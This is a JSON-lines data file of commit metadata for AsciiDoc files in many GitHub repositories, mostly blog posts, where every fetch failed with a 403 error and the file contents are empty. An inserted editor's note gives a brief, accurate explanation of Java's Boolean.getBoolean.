{"commit":"83413b6fcbc8b8ae7991a59d14afdedf4f73501f","subject":"create doc","message":"create doc\n","repos":"slin1972\/-1s,slin1972\/-1s,slin1972\/-1s,slin1972\/-1s","old_file":"doc\/client.adoc","new_file":"doc\/client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slin1972\/-1s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"addfbccf5d40c51a132e7ebbe27b5215b386ddc4","subject":"Fix #192 (#193)","message":"Fix #192 (#193)\n\n* Fix #192\r\n\r\nadd systemProperties.adoc\r\n\r\n* Fix #192\r\n\r\nedit phrasing\r\n\r\n* Fix #192\r\n\r\nedit getBoolean\r\n\r\n* Fix #192\r\n\r\nedit link and table\r\n\r\n* Fix #192 - tweak getBoolean\r\n\r\n* Fix #192 tweak system properties descriptions\r\n\r\n* Fix #192 tweak system properties descriptions","repos":"OpenHFT\/Chronicle-Network","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Network.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
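Editor's note on the `Fix #192` record above: it is a changelog for Chronicle-Network's `systemProperties.adoc`, with repeated wording tweaks around `getBoolean`. The standard-library behavior such doc tweaks likely clarify is easy to misread, so here is a minimal sketch (the property name is purely illustrative; the `Boolean.getBoolean` semantics are standard Java):

[source,java]
----
// Boolean.getBoolean(name) reads a *system property*; it does not parse an
// arbitrary string. It returns true only if the named property exists and
// its value equals "true" (case-insensitive); otherwise it returns false.
System.setProperty("chronicle.example.enabled", "true"); // illustrative name
boolean on  = Boolean.getBoolean("chronicle.example.enabled"); // true
boolean off = Boolean.getBoolean("no.such.property");          // false
----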
01\/2021\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-07-07-debezium-newsletter-01-2021.adoc","new_file":"_posts\/2021-07-07-debezium-newsletter-01-2021.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8acee71c509d0315dd46f6108da2a16a65c9bddc","subject":"CL - changing current working directory","message":"CL - changing current working directory\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d3e10bba92643dc02c14a1169d00ecabe76bfaaa","subject":"Add RPM signing documentation.","message":"Add RPM signing documentation.\n","repos":"google\/grr-doc","old_file":"linuxclient.adoc","new_file":"linuxclient.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/google\/grr-doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ef00596c958487d6c088b6f4c41fc014f135658","subject":"Added links to Meyers'\/Sutter's books","message":"Added links to Meyers'\/Sutter's books","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31d3c8c44a293b56c82ff070cb9b705ae50760d6","subject":"Update 2016-02-26-GO-ing-forward.adoc","message":"Update 2016-02-26-GO-ing-forward.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-02-26-GO-ing-forward.adoc","new_file":"_posts\/2016-02-26-GO-ing-forward.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d483c08751f1351ede0ac2220ed11b508433ee1e","subject":"Update 2016-09-13-Funding.adoc","message":"Update 2016-09-13-Funding.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-13-Funding.adoc","new_file":"_posts\/2016-09-13-Funding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca5c1e1b7deeed50a16655c9ba2037b436dffad2","subject":"Renamed '_posts\/2019-09-29-DB-tips.adoc' to '_posts\/2017-09-29-DB-tips.adoc'","message":"Renamed '_posts\/2019-09-29-DB-tips.adoc' to 
'_posts\/2017-09-29-DB-tips.adoc'","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-09-29-DB-tips.adoc","new_file":"_posts\/2017-09-29-DB-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39ffdfb071a557075ca87c5116e09d160df2d583","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80095c19ecff65bc1a598385d111ab9add02eb98","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d42845df53bd0065909b715c8718506aa702dfaa","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"509d5d01f7f6181d7c9ca6ad15c37a1797141cf4","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"120b53a52f46b85fd5127d633f9fc4af3e63d867","subject":"Update 2018-09-04-Some-Java-oddities.adoc","message":"Update 2018-09-04-Some-Java-oddities.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-09-04-Some-Java-oddities.adoc","new_file":"_posts\/2018-09-04-Some-Java-oddities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09cca17d6bb83d9d4f766f35ca923b3200ca8715","subject":"update documentation","message":"update documentation\n","repos":"robertoschwald\/grails-audit-logging-plugin,tkvw\/grails-audit-logging-plugin","old_file":"audit-logging\/src\/docs\/changelog.adoc","new_file":"audit-logging\/src\/docs\/changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robertoschwald\/grails-audit-logging-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8740350cea190e25eea0e0684dfe93ff93d72e23","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcfc93cd01c57d88b2fa64c60a71873e771d73b0","subject":"Update 2015-10-18-Hello-World.adoc","message":"Update 2015-10-18-Hello-World.adoc","repos":"booleanbalaji\/hubpress.io,booleanbalaji\/hubpress.io,booleanbalaji\/hubpress.io","old_file":"_posts\/2015-10-18-Hello-World.adoc","new_file":"_posts\/2015-10-18-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/booleanbalaji\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f04bdf80b972c3df8ba5d6fe40d08fdbfb0552a6","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49d3c2b5e102defebf137657971822649613df59","subject":"y2b create post This Face Will Eat Your Money...","message":"y2b create post This Face Will Eat Your Money...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-24-This-Face-Will-Eat-Your-Money.adoc","new_file":"_posts\/2016-10-24-This-Face-Will-Eat-Your-Money.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1351a485721035361260628a56cf2e497bc8b045","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 
2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dac381a45433fb10096d4eb68d7a36644416ec97","subject":"Update 2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","message":"Update 2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","new_file":"_posts\/2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f0d778e0c14863e95ebdc9c772e604552b4a74e","subject":"Added yubikey-piv-manager to software list","message":"Added yubikey-piv-manager to software list","repos":"akgood\/yubico-piv-tool,ato\/yubico-piv-tool,hirden\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,Yubico\/yubico-piv-tool,ato\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e9691b856a879923bf48b46c122430ae13166b50","subject":"Update 2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","message":"Update 2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","new_file":"_posts\/2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d7c69f61bffb89784e1bbc7b7cbbc5c5b50aab0","subject":"documentation","message":"documentation\n","repos":"evandor\/skysail-server,evandor\/skysail-server,evandor\/skysail-server,evandor\/skysail-server,evandor\/skysail-server","old_file":"src\/docs\/asciidoc\/history.adoc","new_file":"src\/docs\/asciidoc\/history.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evandor\/skysail-server.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6cc2b0c0ee99459777e6ffc78b848072cff8051","subject":"Update 2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","message":"Update 
{"commit":"dac381a45433fb10096d4eb68d7a36644416ec97","subject":"Update 2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","message":"Update 2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","new_file":"_posts\/2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7f0d778e0c14863e95ebdc9c772e604552b4a74e","subject":"Added yubikey-piv-manager to software list","message":"Added yubikey-piv-manager to software list","repos":"akgood\/yubico-piv-tool,ato\/yubico-piv-tool,hirden\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,Yubico\/yubico-piv-tool,ato\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"}
{"commit":"e9691b856a879923bf48b46c122430ae13166b50","subject":"Update 2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","message":"Update 2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","new_file":"_posts\/2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2d7c69f61bffb89784e1bbc7b7cbbc5c5b50aab0","subject":"documentation","message":"documentation\n","repos":"evandor\/skysail-server,evandor\/skysail-server,evandor\/skysail-server,evandor\/skysail-server,evandor\/skysail-server","old_file":"src\/docs\/asciidoc\/history.adoc","new_file":"src\/docs\/asciidoc\/history.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evandor\/skysail-server.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"a6cc2b0c0ee99459777e6ffc78b848072cff8051","subject":"Update 2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","message":"Update 2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","new_file":"_posts\/2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7a8699ee17bba551153c065ec7f579a54ad82f95","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a993415c6efdf22e37ceba63763d7d8c2c47104b","subject":"Update 2016-09-16-Deep-Language-Modeling-Part-II.adoc","message":"Update 2016-09-16-Deep-Language-Modeling-Part-II.adoc","repos":"ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io","old_file":"_posts\/2016-09-16-Deep-Language-Modeling-Part-II.adoc","new_file":"_posts\/2016-09-16-Deep-Language-Modeling-Part-II.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ilyaeck\/ilyaeck.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a55b7ec139c852fcea874380e316453fc74ee4d1","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"4ee015bbc96c59329f518957a24affb2f7bd8c4f","subject":"Update 2009-12-08-Sony-MDR-EX90SL-Headphone-Bass-Port-Mod.adoc","message":"Update 2009-12-08-Sony-MDR-EX90SL-Headphone-Bass-Port-Mod.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2009-12-08-Sony-MDR-EX90SL-Headphone-Bass-Port-Mod.adoc","new_file":"_posts\/2009-12-08-Sony-MDR-EX90SL-Headphone-Bass-Port-Mod.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9b2e936efa4b3d34f3b854027ed1654520d5b4ec","subject":"y2b create post Speaker Made Of Cardboard - Does It Suck?","message":"y2b create post Speaker Made Of Cardboard - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-19-Speaker-Made-Of-Cardboard--Does-It-Suck.adoc","new_file":"_posts\/2016-09-19-Speaker-Made-Of-Cardboard--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f96e3984c8d208f298eba1f318d31f364fa5a304","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3be3e42b8dd957d388e33a68243ae5d605f4724e","subject":"Update 2018-08-30-naming-of-functions-that-return-boolean.adoc","message":"Update 2018-08-30-naming-of-functions-that-return-boolean.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-naming-of-functions-that-return-boolean.adoc","new_file":"_posts\/2018-08-30-naming-of-functions-that-return-boolean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f17d00ae3eeb61c7194d3464bdc490f201fb6934","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"35c65ac663032c7d19a8512423eab458a850aad4","subject":"Update 2015-01-31-Tendencias.adoc","message":"Update 2015-01-31-Tendencias.adoc","repos":"pavistalli\/pavistalli.github.io,pavistalli\/pavistalli.github.io,pavistalli\/pavistalli.github.io","old_file":"_posts\/2015-01-31-Tendencias.adoc","new_file":"_posts\/2015-01-31-Tendencias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pavistalli\/pavistalli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"4e35db3b0d69536fb0b99738a883ed8f3d401543","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"870b96bf01c3b537c10f672e8fa33d02148f283b","subject":"Update 2016-07-08-Testing-different-parameters-for-the-engine-and-data.adoc","message":"Update 2016-07-08-Testing-different-parameters-for-the-engine-and-data.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-07-08-Testing-different-parameters-for-the-engine-and-data.adoc","new_file":"_posts\/2016-07-08-Testing-different-parameters-for-the-engine-and-data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"252d8f013d0bdb9e68aea14554cdb57e037a3ad4","subject":"Update 2015-07-15-Export-anniversaires-Facebook-vers-fichier-ics.adoc","message":"Update 2015-07-15-Export-anniversaires-Facebook-vers-fichier-ics.adoc","repos":"Astalaseven\/astalaseven.github.io,Astalaseven\/astalaseven.github.io,Astalaseven\/astalaseven.github.io","old_file":"_posts\/2015-07-15-Export-anniversaires-Facebook-vers-fichier-ics.adoc","new_file":"_posts\/2015-07-15-Export-anniversaires-Facebook-vers-fichier-ics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Astalaseven\/astalaseven.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e636652dc227e49411846e1cd6ab8c657f1b1bd5","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2625e66e0ad497c094ae894abe2fb39cd8cd7485","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
